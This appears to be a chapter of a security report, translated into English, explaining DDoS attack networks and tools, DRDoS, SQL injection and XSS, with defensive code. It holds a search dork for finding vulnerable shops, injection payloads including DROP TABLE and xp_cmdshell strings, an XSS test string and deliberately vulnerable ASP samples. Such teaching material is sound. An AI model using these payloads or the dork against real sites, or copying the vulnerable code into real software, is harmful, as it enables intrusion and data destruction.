In general a DDoS attack-network follows one of two main models:
- The Agent-Handler model
- The IRC-Based model

Figure 2.2. Main diagram classifying the kinds of DDoS attack (diagram labels: DDoS attack-network; Agent-Handler; IRC-Based; Client Handler Communication; TCP; UDP; ICMP; Secret/private channel; Public channel)

i. The Agent-Handler model:
In this model the attack-network has 3 components: Agent, Client and Handler.
- Client: the base software from which the hacker controls all activity of the attack-network.
- Handler: an intermediate software component between the Agent and the Client.
- Agent: the software component that carries out the attack on the target, receiving control from the Client through the Handlers.
Figure 2.3. Agent-Handler attack-network architecture (diagram labels: Attacker; Handler; Agent; Victim)
From the Client the attacker communicates with the Handlers to determine how many Agents are online, to adjust the timing of the attack and to update the Agents. Depending on how the attacker configures the attack-network, the Agents are managed by one or more Handlers.
The attacker usually places the Handler software on a router or on a server that carries a lot of traffic. This is meant to make the communication between Client, Handler and Agent hard to detect. This communication usually takes place over the TCP, UDP or ICMP protocols. The real owners of the Agents usually have no idea that they are being used in a DDoS attack, because they lack the knowledge or because the Backdoor Agent programs use so few system resources that almost no effect on system performance can be seen.
ii. The IRC-Based model:
Internet Relay Chat (IRC) is a multi-user online chat system. IRC lets a user create a multipoint connection to many other users and chat in real time. The architecture of an IRC network consists of many IRC servers across the Internet communicating with one another over many channels. An IRC network lets users create three kinds of channel: public, private and secret.
- Public channel: lets users of the channel see the IRC name and receive the messages of every other user on the same channel.
- Private channel: designed for communicating with permitted parties. Users who are not on the channel cannot see the IRC names and messages on it. However, if a user outside the channel uses certain channel locator commands, he can learn that the private channel exists.
- Secret channel: like a private channel, but it cannot be found with a channel locator.

Figure 2.4. IRC-Based attack-network architecture (diagram labels: Attacker; IRC Network; Agent; Victim)
An IRC-Based network is similar to an Agent-Handler network, but this model uses IRC channels as the means of communication between Client and Agent (no Handler is used). With this model the attacker gains some further advantages:
- The communication takes the form of chat messages, which makes it extremely hard to detect.
- IRC traffic can move across the network in large volumes without arousing suspicion.
- There is no need to maintain a list of Agents; the hacker only has to log on to the IRC server to receive reports on the status of the Agents sent back through the channels.
- Finally, IRC is also a file sharing environment, which makes it easy to spread the Agent code to many other machines.

-24-

2.2.2.3. Classification of DDoS attacks
There are many variants of DDoS attack techniques, but from a technical point of view they can be divided into two classes according to the purpose of the attack: exhausting bandwidth and exhausting system resources.

Figure 2.5. Classification of DDoS attack types (diagram nodes: DDoS attack; Bandwidth Depletion; Flood Attack; UDP; ICMP; Random Port Attack; Static Port Attack; Spoof Source Attack; Amplification Attack; Smurf Attack; Fraggle Attack; Direct Attack; Loop Attack; Resource Depletion; Protocol Exploit Attack; TCP SYN Attack; PUSH+ACK Attack; Malformed Packet Attack; IP Address Attack; IP Packet Options Attack)


i. Attacks that exhaust network bandwidth (Bandwidth Depletion Attack)
A Bandwidth Depletion Attack is designed to flood the target network with unnecessary traffic, with the aim of minimizing the ability of legitimate traffic to reach the target's service system.
There are two kinds of Bandwidth Depletion Attack:
+ Flood attack: the Agents are directed to send a large volume of traffic to the target's service system, so that the service runs out of bandwidth.
+ Amplification attack: the Agents, or the Client itself, are directed to send messages to a broadcast IP address, so that every machine in that subnet sends messages to the target's service system. This method multiplies the unnecessary traffic and reduces the target's bandwidth.

Flood attack:
In this method the Agents send a large volume of IP traffic that slows the target's service system down, hangs it or drives it to saturation, so that the real users of the system cannot use the service.
Flood attacks can be divided into two kinds:
+ UDP Flood Attack: because UDP is connectionless, a system receiving UDP messages simply accepts every packet it has to process. A large volume of UDP packets sent to the target's service system pushes the whole system to its limit.
These UDP packets can be sent to many arbitrary ports or to a single port. Usually they are sent to many ports, which forces the target system to strain to demultiplex them. If the attacked port is not available, the target system sends back an ICMP packet of type "destination port unreachable". The Agent software usually uses a forged IP address to hide its tracks, so the messages returned because no port handles the packet go to some other IP address. A UDP flood can also affect connections around the target, because the packets converge very heavily.
+ ICMP Flood Attack: ICMP is designed for network management and for locating network devices. When the Agents send a large volume of ICMP_ECHO_REPLY to the target system, the system has to reply with a corresponding volume of packets, which congests the link. As in the previous case, the IP addresses of the Agents may be forged.

Amplification attack:
An Amplification Attack uses the broadcast IP address support of routers to amplify and reflect the attack. This function lets the sender specify one broadcast IP address for the whole receiving subnet instead of many addresses. The router is then responsible for delivering the broadcast packet it receives to every IP address in that subnet.

The attacker can send the broadcast message directly or through a number of Agents in order to increase the intensity of the attack. If the attacker sends the message directly, the systems inside the broadcast network can be used as Agents.

Figure 2.6. Diagram of the Amplification Attack (diagram: Attacker/Agent, Amplifier, amplifier network systems, Victim)

Amplification attacks can be divided into two kinds, Smurf and Fraggle attacks:
+ Smurf attack: in this attack the attacker sends packets to a network amplifier (a router or other network device that supports broadcast), using the victim's address as the sender address. The packets are usually ICMP ECHO REQUEST, which require the receiver to answer with an ICMP ECHO REPLY packet. The network amplifier delivers the ICMP ECHO REQUEST packet to every system covered by the broadcast address, and all of these systems send their REPLY packets to the IP address of the target of the Smurf attack.

+ Fraggle attack: similar to the Smurf attack, but UDP ECHO packets are sent toward the target instead of ICMP ECHO REQUEST packets. There is in fact another variant of the Fraggle attack that sends UDP ECHO packets to the target's chargen port (port 19/UNIX) with the target's echo port (port 7/UNIX) as the sender address, creating an infinite loop. The attacker starts the attack with an ECHO REQUEST whose destination is a broadcast address; every system covered by that address immediately sends a REPLY to the victim's echo port, the victim then sends an ECHO REPLY back to the broadcast address, and the process keeps going. This is why the Fraggle attack is far more dangerous than the Smurf attack.
ii. Attacks that exhaust resources (Resource Depletion Attack)
By definition, a Resource Depletion Attack is one in which the attacker sends packets that use protocols contrary to their designed function, or sends packets intended to clog network resources, so that these resources can no longer serve ordinary users.
a/ Protocol Exploit Attack:
+ TCP SYN Attack: the Transmission Control Protocol supports highly reliable delivery, so it uses a handshake between sender and receiver before data is transferred. In the first step the sender sends a SYN REQUEST packet (Synchronize). If the receiver gets the SYN REQUEST, it answers with a SYN/ACK REPLY packet. In the last step the sender transmits the final ACK packet and starts sending data.

Figure 2.7. TCP SYN Attack (diagram: the TCP client, on a client port in 1024-65535, sends SYN; the TCP server, on a service port in 1-1023 such as 80, answers SYN/ACK; the client returns ACK)

If the server has answered a SYN request with a SYN/ACK REPLY but does not receive the final ACK packet within a set period, it resends the SYN/ACK REPLY until the timeout expires. All the system resources reserved for handling the session once the final ACK arrives stay locked until the timeout expires.
Knowing this weakness, the attacker sends the victim a SYN packet with a forged sender address. The victim sends the SYN/ACK REPLY to some other address and never receives the final ACK packet; only when the timeout expires does the victim notice and release the system resources. If forged SYN packets arrive in large numbers and in rapid succession, the victim's system can run out of resources.

Figure 2.8. Attacker spoofing the IP address (diagram: a normal Client-Server exchange of SYN, SYN/ACK and ACK beside an Attacker/Agent-Server exchange in which the server's SYN/ACK replies are never acknowledged)
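A detection-side view of the half-open handshakes described above, as an added example that is not part of the original document: it replays a constructed packet log and reports servers that are holding SYNs which never received the final ACK. The log format, the addresses (documentation ranges), the timeout and the threshold are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Constructed sample log: "<time> <src>:<sport> > <dst>:<dport> <flags>"
# Flags: S = SYN, SA = SYN/ACK, A = ACK. All values are made up.
SAMPLE = """\
0.00 203.0.113.5:40001 > 192.0.2.10:80 S
0.01 192.0.2.10:80 > 203.0.113.5:40001 SA
0.02 203.0.113.5:40001 > 192.0.2.10:80 A
1.00 198.51.100.7:1111 > 192.0.2.10:80 S
1.00 192.0.2.10:80 > 198.51.100.7:1111 SA
1.10 198.51.100.8:2222 > 192.0.2.10:80 S
1.10 192.0.2.10:80 > 198.51.100.8:2222 SA
1.20 198.51.100.9:3333 > 192.0.2.10:80 S
1.20 192.0.2.10:80 > 198.51.100.9:3333 SA
4.10 192.0.2.10:80 > 198.51.100.7:1111 SA
9.00 203.0.113.6:40002 > 192.0.2.10:80 S
"""

LINE = re.compile(r"^(\d+\.\d+) (\S+):(\d+) > (\S+):(\d+) (S|SA|A)$")


def half_open(log_text, now, timeout):
    """Return {server_endpoint: [client_endpoint, ...]} for handshakes whose
    SYN is at least `timeout` seconds old and never got the final ACK."""
    pending = {}  # (client, server) -> time of the first SYN
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # ignore lines that are not in the expected format
        t, src, sport, dst, dport, flags = m.groups()
        sender, receiver = f"{src}:{sport}", f"{dst}:{dport}"
        if flags == "S":
            # First SYN opens a pending handshake; retransmits keep the time.
            pending.setdefault((sender, receiver), float(t))
        elif flags == "A":
            # Final ACK from the client completes the handshake.
            pending.pop((sender, receiver), None)
        # "SA" is the server's reply or its retransmission: state unchanged.
    stuck = defaultdict(list)
    for (client, server), first_syn in pending.items():
        if now - first_syn >= timeout:
            stuck[server].append(client)
    return dict(stuck)


def syn_flood_suspects(log_text, now, timeout=3.0, threshold=3):
    """Servers holding at least `threshold` timed-out half-open handshakes."""
    stuck = half_open(log_text, now, timeout)
    return sorted(s for s, clients in stuck.items() if len(clients) >= threshold)


if __name__ == "__main__":
    print(half_open(SAMPLE, now=10.0, timeout=3.0))
    print(syn_flood_suspects(SAMPLE, now=10.0))
```

The SYN from 203.0.113.6 is not reported because it is younger than the timeout; only handshakes that the server has been holding past the timeout count toward the threshold.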


+ PUSH + ACK Attack: in TCP, packets are held in a buffer, and when the buffer is full they are passed on to where they are needed. However, the sender can ask the system to unload the buffer before it is full by sending a packet with the PUSH and ACK bits set to 1. Such packets make the victim's system unload all the data in the TCP buffer immediately and send back an ACK packet when it has done so. If this is repeated continuously by many Agents, the system cannot process the large volume of incoming packets and hangs.
b/ Malformed Packet Attack:
A Malformed Packet Attack uses the Agents to send packets whose structure does not conform to the standard, in order to hang the victim's system.
There are two kinds of Malformed Packet Attack:
+ IP address attack: uses packets whose source and destination addresses are identical, which the victim's operating system cannot handle, so it hangs.
+ IP packet options attack: randomizes the OPTION field of the IP packet and sets all the QoS bits to 1, which forces the victim's system to spend time analysing the packet. With a large number of Agents, the victim's system can run out of processing capacity.
c/ Some characteristics of DDoS attack tools:

Figure 2.9. Some characteristics of DDoS attack tools (diagram nodes: DDoS software tool; Agent setup; Installation: active, passive; Backdoor; Trojan; Buffer overflow; Bugged website; Corrupted file; Hide with rootkit: yes, no; Attack network communication; Protocol: TCP, UDP, ICMP; Encryption: yes, no; Agent-Handler; Client-Handler; IRC-Based: private/secret, public; OS supported: Unix, Solaris, Linux, Windows; Agent activation methods: actively poll, live and wait)


DDoS attack tools have a great deal in common as software: the way the Agent software is installed, the way the attacker, Handler and Agent communicate, and the operating systems the tools support. The diagram above compares these DDoS attack tools.
* How the DDoS Agent is installed:
The attacker can use active and passive methods to install the Agent software on other machines in order to build an Agent-Handler or IRC-Based attack-network.
- Active installation:
+ Scanning: tools such as Nmap and Nessus are used to find weaknesses on systems that are online, in order to install the Agent software. Note that Nmap returns information about a system specified by IP address, while Nessus searches arbitrary IP addresses for a particular known weakness.
+ Backdoor: after obtaining a list of systems that can be abused, the attacker breaks in and installs the Agent software on them. A great deal of information about how to break in is available on the network, for example the site of the Common Vulnerabilities and Exposures (CVE) organization, which lists and classifies more than 4,000 kinds of flaw across all existing systems. This information is always available to network administrators and hackers alike.
+ Trojan: a program that performs some ordinary function but also contains hidden functions that serve the author's own purposes and that the user cannot know about. A trojan can be used as Agent software.
+ Buffer overflow: by exploiting a buffer overflow flaw, the attacker can divert the normal execution flow of a program into the execution flow of the hacker's program (located in the overwritten data area). This method can be used against a program with a buffer overflow weakness in order to run the Agent software.
- Passive installation:
+ Bugged website: the attacker can exploit flaws in the web browser to install the Agent software on the machine of a visiting user. The attacker creates a website whose content hides code and commands that trap the user. When the user visits the site, the site secretly downloads and installs the Agent software. The Microsoft Internet Explorer web browser is the usual target of this method, because ActiveX flaws can let the IE browser automatically download and install code on the machine of the browsing user.
+ Corrupted file: another method is to embed code in ordinary files. When the user reads or executes such a file, the machine is immediately infected with the Agent software. One common technique is to give the file a very long name: because operating systems by default display only the first part of a file name, the attacker can send the victim an e-mail attachment such as iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe. Seeing only the "Iloveyou.txt" part, the user opens the file to read it, the file is executed at once and the Agent code is installed on the victim's machine. There are many other ways as well, such as disguising files or binding files together.

- Rootkit: programs used to erase the traces of an Agent's or Handler's presence on the victim's machine. Rootkits are usually used where Handler software has been installed, since the Handler plays a vital role in the operation of the attack-network, or in environments where the Handler is very likely to be detected. Rootkits are rarely used on Agents, because an individual Agent matters little and losing a few Agents has little effect on the attack-network.
* Communication on the attack-network:
- Protocol: communication on the attack-network can run over TCP, UDP or ICMP.
- Encrypted communication: a few DDoS tools support encrypting communication across the whole attack-network. The encryption method depends on the protocol used for communication. If the attack-network is IRC-Based, private and secret channels already support encrypted communication.
- Agent activation: there are two main ways to activate an Agent. In the first, the Agent regularly polls the Handler or the IRC channel for instructions (active Agent). In the second, the Agent simply lies dormant and waits for instructions from the Handler or the IRC channel.
* Platforms supported by the Agent:
DDoS tools are usually designed to work on many different operating systems, such as Unix, Linux, Solaris and Windows. The components of the attack-network can run in different operating-system environments.
The Handler usually runs on the systems found on large servers, such as Unix, Linux or Solaris. The Agent usually runs on the most widespread operating system, Windows, because a large number of easily exploited machines is needed.
* Functions of DDoS tools:
Each DDoS tool has its own command set, which is carried out by the Handler and the Agent. The command set common to all the tools can nevertheless be classified in general terms as follows:
HANDLER COMMAND SET
Command | Description
Log On | Used to log on to the Handler software (user + password)
Turn On | Activates the Handler so that it is ready to receive commands
Log Off | Used to log off from the Handler software
Turn Off | Instructs the Handler to stop operating; if the Handler is scanning for Agents, it stops doing so immediately
Initiate Attack | Orders the Handler to direct every Agent under it to attack the specified target
List Agents | Asks the Handler to list the Agents under it
Kiss Agents | Removes an Agent from the ranks of the attack-network
Add victim | Adds an attack target
Download Upgrades | Updates the Handler software (downloads file.exe and executes it)
Set Spoofing | Activates and sets up the IP address spoofing mechanism for the Agents
Set Attack Time | Sets the time of the attack for the Agents
Set Attack Duration | Announces the duration of the attack on the target
BufferSize | Sets the size of the Agent's buffer (to increase the Agent's power)
Help | Instructions for using the program

AGENT COMMAND SET
Command | Description
Turn On | Activates the Agent so that it is ready to receive commands
Turn Off | Instructs the Agent to stop operating; if the Agent is scanning for a Handler/IRC channel, it stops doing so immediately
Initiate Attack | Orders the Agent to attack the specified target
Download Upgrades | Updates the Agent software (downloads a .exe file and executes it)
Set Spoofing | Sets up the IP address spoofing mechanism for the Agents' operation
Set Attack Duration | Announces the duration of the attacks on the target
Set Packet Size | Sets the size of the attack packet
Help | Instructions for using the program

d. Some DDoS tools:
Many tools have been written on the common foundation described above. These tools are usually open source, so they keep growing in complexity and new variants keep appearing.
* Agent-Handler DDoS tools:
- TrinOO: one of the first DDoS tools to be widely distributed. TrinOO has an Agent-Handler architecture and is a Bandwidth Depletion Attack tool that uses the UDP flood technique. The first versions of TrinOO did not support IP address spoofing. The TrinOO Agent is installed by exploiting a remote buffer overrun flaw. It runs on Solaris 2.5.1 and Red Hat Linux 6.0. The attack network communicates over TCP (attacker client and Handler) and UDP (Handler and Agent). Communication is encrypted with symmetric encryption between Client, Handler and Agent.
- Tribe Flood Network (TFN): Agent-Handler architecture; a DDoS tool that supports both Bandwidth Depletion and Resource Depletion attacks. It uses UDP flood, ICMP flood, TCP SYN and Smurf attack techniques. The first versions did not support IP address spoofing. The TFN Agent is installed by exploiting a buffer overflow flaw. It runs on Solaris 2.x and Red Hat Linux 6.0. The attack network communicates using ICMP ECHO REPLY packets (TFN2K adds TCP/UDP with the option of choosing the protocol freely) and does not encrypt communication (TFN2K supports encryption).
- Stacheldraht: a variant of TFN with the added ability to update the Agents automatically. Communication between Attacker and Handler is over telnet with symmetric encryption.
- Shaft: a variant of TrinOO; Handler-Agent communication is over UDP and Attacker-Handler communication is over the Internet. It attacks with UDP, ICMP and TCP flood techniques and can combine several kinds of attack at once. It keeps detailed statistics that let the attacker know how badly the victim is affected and how large the attack is, in order to adjust the number of Agents.
* IRC-Based DDoS tools:
IRC-Based DDoS tools were developed after the Agent-Handler tools. They are much more complex, however, because they integrate many of the features of the Agent-Handler DDoS tools.
- Trinity: a typical tool of this kind. Trinity has almost every attack technique, including UDP, TCP SYN, TCP ACK, TCP fragment, TCP NULL, TCP RST, TCP random flag and TCP ESTABLISHED packet floods. It has a built-in ability to randomize the sender address. Trinity also supports TCP flood packets with randomized CONTROL FLAG sets. Trinity can be called one of the most dangerous DDoS tools.
- Other DDoS tools worth mentioning include Knight, which is designed to run on Windows and uses the installation technique of the Back Orifice trojan. Knight uses attack techniques such as SYN, UDP Flood and Urgent Pointer Flooder.
- Last is Kaiten, a variant of Knight that supports many attack techniques, such as UDP, TCP flood, SYN and PUSH + ACK attacks. Kaiten also inherits Trinity's ability to randomize spoofed addresses.
2.2.3. Distributed Reflection Denial of Service (DRDoS) attacks
DRDoS appeared in early 2002 and is the newest and most powerful kind of attack in the DoS family. Carried out by a skilled attacker, it can bring down any system in a moment.
The main goal of DRDoS is to take over the server's entire bandwidth, that is, to completely block the connection from the server to the Internet backbone and to consume the server's resources. While the server is under a DRDoS attack, no client can connect to it. All services running over TCP/IP, such as DNS, HTTP, FTP and POP3, are disabled.
Basically, DRDoS is a combination of the DoS and DDoS styles. It has both the SYN attack from a single computer and the combination of many computers to take up bandwidth, as in DDoS. The attacker forges the address of the target server and sends SYN requests to large servers such as Yahoo and Microsoft, so that these servers send SYN/ACK packets to the target server. The large servers, with their powerful links, unwittingly play the role of zombies for the attacker, as in DDoS.

Figure 2.10. Diagram of the DRDoS attack

The sending is repeated continuously with many forged IP addresses from the attacker. Because many large servers take part, the target server is quickly overloaded and its bandwidth is taken up by the large servers. The "artistry" lies in the fact that with just one computer and a 56 kbps modem, a skilled hacker can defeat any server in an instant without having to take over any machine as a means of carrying out the attack.
2.3. SQL Injection
2.3.1. SQL injection attacks
2.3.1.1. What is SQL injection?
When deploying web applications on the Internet, many people still think that ensuring security, in order to minimize the chance of being attacked by hackers, is only a matter of choosing the operating system, the database management system and the web server that will run the application, and forget that the application running on them can itself contain a very large security hole. One of these holes is SQL injection. In Vietnam, the period when website administrators neglected virus scanning and patching of system software has passed, but flaws in the applications themselves still receive very little attention. That is why quite a few websites in Vietnam have been attacked recently, and most of the cases were SQL injection flaws [1]. So what is SQL injection?
SQL injection is a technique that lets attackers exploit holes in the input validation of web applications, together with the error messages of the database management system, to inject and execute illegitimate SQL statements (ones the application developer did not anticipate). The consequences are severe, because the attacker can delete, modify and so on, having full control over the application's database and even over the server the application runs on. This flaw usually occurs in web applications whose data is managed by database management systems such as SQL Server, MySQL, Oracle, DB2 and Sybase.
2.3.1.2. Forms of SQL injection attack
There are four common forms: bypassing the login check (authorization bypass), using the SELECT statement, using the INSERT statement, and using stored procedures [2], [3].
To find shopping websites that use an SQL database, one uses software or flaw-finding tools, or search engines such as Google with search dorks such as:
inurl : product.php?id=

Figure 2.11. An online tool for finding flawed sites

To find out whether a website has an SQL injection flaw, a single quote (') is appended to the URL in the address bar.
Example: http://www.doanchuyenganh.com/product.php?id=123

Figure 2.12. A site with an SQL injection flaw


i. Bypassing the login check
With this form of attack, a hacker can easily get past login pages by exploiting a flaw in the way SQL statements are used to operate on the web application's database.
Consider a typical example. To let users into protected pages, a system usually has a login page that asks for a user name and a password. After the user enters them, the system checks whether the user name and password are valid and decides whether to allow or refuse further access. In this case two pages may be used: an HTML page that displays the input form and an ASP page that processes the information entered by the user. Example:
login.htm
<form action="ExecLogin.asp" method="post">
  Username: <input type="text" name="fUSRNAME"><br>
  Password: <input type="password" name="fPASSWORD"><br>
  <input type="submit">
</form>
execlogin.asp
<%
Dim vUsrName, vPassword, objRS, strSQL
vUsrName = Request.Form("fUSRNAME")
vPassword = Request.Form("fPASSWORD")
' Vulnerable: user input is concatenated directly into the SQL text
strSQL = "SELECT * FROM T_USERS " & _
         "WHERE USR_NAME='" & vUsrName & _
         "' and USR_PASSWORD='" & vPassword & "'"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
If (objRS.EOF) Then
    Response.Write "Invalid login."
Else
    Response.Write "You are logged in as " & objRS("USR_NAME")
End If
Set objRS = Nothing
%>
At first glance the code in execlogin.asp does not seem to contain any security hole: a user cannot log in without a valid user name and password. In fact the code is not safe and is the basis for an SQL injection flaw. The weakness is that the data entered by the user is used directly to build the SQL statement, which lets an attacker control the query that will be executed. For example, suppose the user enters the following string in both the username and password fields of login.htm: ' OR ''='
The query that is executed is then:
SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and USR_PASSWORD= '' OR ''=''
This query is valid and returns every record in T_USERS, and the code that follows treats this illegitimate login as a valid one.
ii. Attacks that use the SELECT statement
This form of attack is more complex. To carry it out, the attacker must be able to understand and exploit the information leaked in the system's error messages in order to find the weak points from which to start. Consider an example that is very common on news websites. There is usually a page that receives the ID of the news item to display and then queries the content of the item with that ID. Example: http://www.doanchuyennganh.com/product.asp?ID=123 . The source code for this function is usually written quite simply, along these lines:
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
' Vulnerable: the ID value is appended to the SQL text without a type check
strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
In normal situations this code displays the news item whose ID matches the given ID, and no flaw is apparent. Like the login example above, however, it leaves an opening for another SQL injection flaw. The attacker can replace a valid ID with a different value and use it to start an illegitimate attack, for example: 0 OR 1=1 (that is, http://www.doanchuyennganh.com/product.asp?ID=0 or 1=1).
The SQL query now returns every article in the table, because it executes the statement:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Another case is a search page. Such a page lets the user enter search terms such as first name, last name and so on. The code commonly seen is:
<%
Dim vAuthorName, objRS, strSQL
vAuthorName = Request("fAUTHOR_NAME")
' Vulnerable: the author name is concatenated into the SQL text
strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME ='" & _
         vAuthorName & "'"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
As above, a hacker can exploit the weakness in the SQL query by entering the following value in the author name field:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ''=' (*)
Now, besides the first query, which fails, the program also executes the statement that follows the UNION keyword.

The examples above may not seem dangerous, but imagine that the attacker can delete the entire database by inserting dangerous statements such as DROP TABLE. For example: ' DROP TABLE T_AUTHORS --
You may wonder how one can tell that a web application has this kind of flaw. It is simple: enter the string (*) above. If the system reports a syntax error of the form: Invalid object name "OtherTable", it is certain that the system executed the SELECT after the UNION keyword, since only then could it return the error deliberately created in that SELECT statement.
You may also wonder how the names of the tables can be found in order to carry out destructive operations when the web application has an SQL injection flaw. This is simple too, because SQL Server has two objects, sysobjects and syscolumns, that list all the table and column names in the system. The SELECT statement only needs to be adjusted, for example:
' UNION SELECT name FROM sysobjects WHERE xtype = 'U'
to list the names of all the data tables.
iii. Attacks that use the INSERT statement
Web applications usually let users register an account in order to take part. An indispensable function is that, after registering successfully, users can view and edit their own information. SQL injection can be used when the system does not check the validity of the information entered.
For example, an INSERT statement may have the form: INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). If the code that builds the SQL statement looks like this:
<%
' Vulnerable: the three values are concatenated into the INSERT statement
strSQL = "INSERT INTO TableName VALUES('" & strValueOne & "', '" _
         & strValueTwo & "', '" & strValueThree & "')"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
then it certainly has an SQL injection flaw, because if the first field is given a value such as: ' + (SELECT TOP 1 FieldName FROM TableName) + ' the query becomes: INSERT INTO TableName VALUES('' + (SELECT TOP 1 FieldName FROM TableName) + '', 'abc', 'def'). When the stored information is later viewed, it is as if one more statement had been requested, namely: SELECT TOP 1 FieldName FROM TableName
iiii. Attacks that use stored procedures
An attack through stored procedures does great damage if the application runs with the system administrator privilege 'sa'. For example, if the injected code is replaced with: ' ; EXEC xp_cmdshell cmd.exe dir C: ' the system executes a command that lists the directory on the C:\ drive where the server is installed. What kind of damage is done depends on the command that follows cmd.exe.
2.3.2. How to prevent SQL injection
As shown above, SQL injection exploits the carelessness of web application programmers in handling input data when building SQL statements. The damage from an SQL injection flaw depends on the environment and on how the system is configured. If the application uses the dbo privilege (the privilege of the database owner) when working with data, the injected statement can delete all the data tables, create new tables and so on. If the application uses the sa privilege (system administrator), it can control the entire database management system, and with such broad privileges it can create illegitimate user accounts to control your system. Prevention can be applied at two levels:
i. Strictly control input data
To prevent the risks described, protect the SQL statements by strictly controlling all input received from the Request object (Request, Request.QueryString, Request.Form, Request.Cookies and Request.ServerVariables). For example, the length of input strings can be limited, or an EscapeQuotes function can be written to replace each single quote with two single quotes:
<%
' Double every single quote so the value cannot close the SQL string literal
Function EscapeQuotes(sInput)
    sInput = Replace(sInput, "'", "''")
    EscapeQuotes = sInput
End Function
%>
When the input is numeric, the flaw comes from replacing a value that is expected to be numeric with a string containing an illegitimate SQL statement. To avoid this, simply check that the data is of the right type with the IsNumeric() function.
In addition, a function can be written to remove certain dangerous characters and keywords, such as ;, --, select, insert, xp_ and so on, from the string entered by the user, to limit attacks of this kind:
<%
' Strip the listed keywords and characters from the input string
Function KillChars(sInput)
    Dim badChars, newChars, i
    badChars = Array("select", "drop", ";", "--", "insert", "delete", "xp_")
    newChars = sInput
    For i = 0 To UBound(badChars)
        newChars = Replace(newChars, badChars(i), "")
    Next
    KillChars = newChars
End Function
%>
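The login and ID lookups of section 2.3.1.2, rebuilt as an added example (not code from the original document) in Python with an in-memory SQLite database so that it runs offline: the concatenated query accepts the ' OR ''=' input, while bound parameters and a numeric check reject it. Parameter binding goes beyond the escaping functions described in this section; the table contents and function names are constructed for the illustration.

```python
import sqlite3


def make_db():
    """Build a throwaway database that mirrors the tables named in the text."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE T_USERS (USR_NAME TEXT, USR_PASSWORD TEXT)")
    db.execute("CREATE TABLE T_NEWS (NEWS_ID INTEGER, TITLE TEXT)")
    # Constructed rows; plaintext passwords only mirror the page's T_USERS table.
    db.executemany("INSERT INTO T_USERS VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    db.executemany("INSERT INTO T_NEWS VALUES (?, ?)",
                   [(1, "first"), (2, "second")])
    return db


def login_concat(db, user, password):
    # Same construction as execlogin.asp: the input becomes part of the SQL text.
    sql = ("SELECT USR_NAME FROM T_USERS WHERE USR_NAME='" + user +
           "' and USR_PASSWORD='" + password + "'")
    return sorted(row[0] for row in db.execute(sql))


def login_bound(db, user, password):
    # The input travels as bound parameters and is only ever compared as data.
    sql = "SELECT USR_NAME FROM T_USERS WHERE USR_NAME=? AND USR_PASSWORD=?"
    return sorted(row[0] for row in db.execute(sql, (user, password)))


def news_by_id(db, raw_id):
    # Counterpart of the IsNumeric() check: accept ASCII digits only.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("ID must be numeric")
    sql = "SELECT TITLE FROM T_NEWS WHERE NEWS_ID=?"
    return [row[0] for row in db.execute(sql, (int(raw_id),))]


if __name__ == "__main__":
    db = make_db()
    crafted = "' OR ''='"          # the input quoted in section 2.3.1.2
    print("concatenated:", login_concat(db, crafted, crafted))
    print("bound:       ", login_bound(db, crafted, crafted))
    print("valid login: ", login_bound(db, "alice", "s3cret"))
    try:
        news_by_id(db, "0 OR 1=1")
    except ValueError as exc:
        print("rejected ID: ", exc)
```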
ii. Configure the database management system securely
There must be a mechanism that strictly controls and limits the data privileges of the user account that the web application uses. Ordinary applications should avoid privileges such as dbo or sa. The more restricted the privileges, the smaller the damage.
In addition, to avoid the risks of SQL injection attacks, take care to remove any technical information from the messages sent to the user when the application fails. Ordinary error messages reveal technical details that can let an attacker learn the weak points of the system.
2.4. Cross Site Scripting (XSS)
2.4.1. XSS attacks
Cross-Site Scripting (XSS) is one of the most common attack techniques today, and also one of the most important security problems for web developers and for web users. Any website that lets users post information without strictly checking for dangerous code may contain XSS flaws.
Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with the Cascading Style Sheets of HTML), is an attack technique that inserts HTML tags or dangerous script code into dynamic websites (ASP, PHP, CGI, JSP ...) in a way that can harm other users. The inserted code is mostly written in client-side script languages such as JavaScript, JScript and DHTML, and may also consist of HTML tags. XSS quickly became one of the most common flaws in web applications, and its threat to users keeps growing. The winner of the eWeek OpenHack 2002 contest was the person who found two new XSS flaws. Perhaps the danger of XSS is now receiving more and more attention.
+ How XSS works
Basically XSS, like SQL injection or source injection, consists of requests sent from client machines to the server in order to insert information that is beyond the server's control. It can be a request sent from a data form, or simply a URL such as http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script>
Your browser will very likely display the message "XSS was found !". The code inside the script tag is not limited in any way, because it can be replaced by a source file on another server through the src attribute of the script tag. For that reason the danger of XSS flaws cannot yet be fully measured.
However, while other attack techniques can change the source data of the web server (source code, structure, database), XSS only harms the website on the client side, and its direct victims are the visitors who browse the site. Hackers do sometimes use this technique to deface websites, but that still only attacks the surface of the website. XSS consists of client-side scripts that are run only by the browser on the client side, so XSS does not affect the website system on the server. The targets of XSS are the other users of the website: when they unknowingly visit pages containing dangerous code left by hackers, they may be redirected to other websites or have their home page reset, or worse, lose passwords or cookies, and their computers may even have viruses, backdoors or worms installed.
+ How the attack is carried out
i: Finding XSS holes in a web application
Method 1: Use web application scanning programs, for example Web Vulnerability Scanner, to scan for XSS flaws.
Method 2: Follow 5 steps:
Step 1: Open the website to be checked.
Step 2: Identify the places (parts) that need to be checked for XSS. Any site always has these parts: search, error messages, web forms. XSS flaws are mostly found there; in general XSS can occur wherever the user can enter data and then gets something back. For example, we enter the string 'XSS'.
